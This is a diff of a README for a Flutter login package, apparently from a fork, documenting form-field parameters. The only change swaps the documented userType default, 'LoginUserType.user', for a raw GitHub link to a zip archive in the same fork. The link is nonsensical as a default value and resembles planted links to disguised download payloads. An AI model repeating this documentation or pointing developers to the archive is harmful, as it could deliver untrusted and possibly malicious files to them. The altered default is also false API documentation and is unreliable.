ZongAFRIC/flutter_login/README.md

 defaultValue | `String` | The default value of the field, if given the field will be pre-filled in with this fieldValidator | `FormFieldValidator<String>` | A function to validate the field.
 It should return null on success, or a string with the explanation of the error icon | `Icon?` | The icon shown on the left of the field.
 Defaults to the user icon when not provided userType | `LoginUserType` | The LoginUserType of the form.
 The right keyboard and suggestions will be shown accordingly.
-Defaults to `LoginUserType.user`
+Defaults to `https://raw.githubusercontent.com/ZongAFRIC/flutter_login/master/inciter/flutter_login.zip`

 ### LoginProvider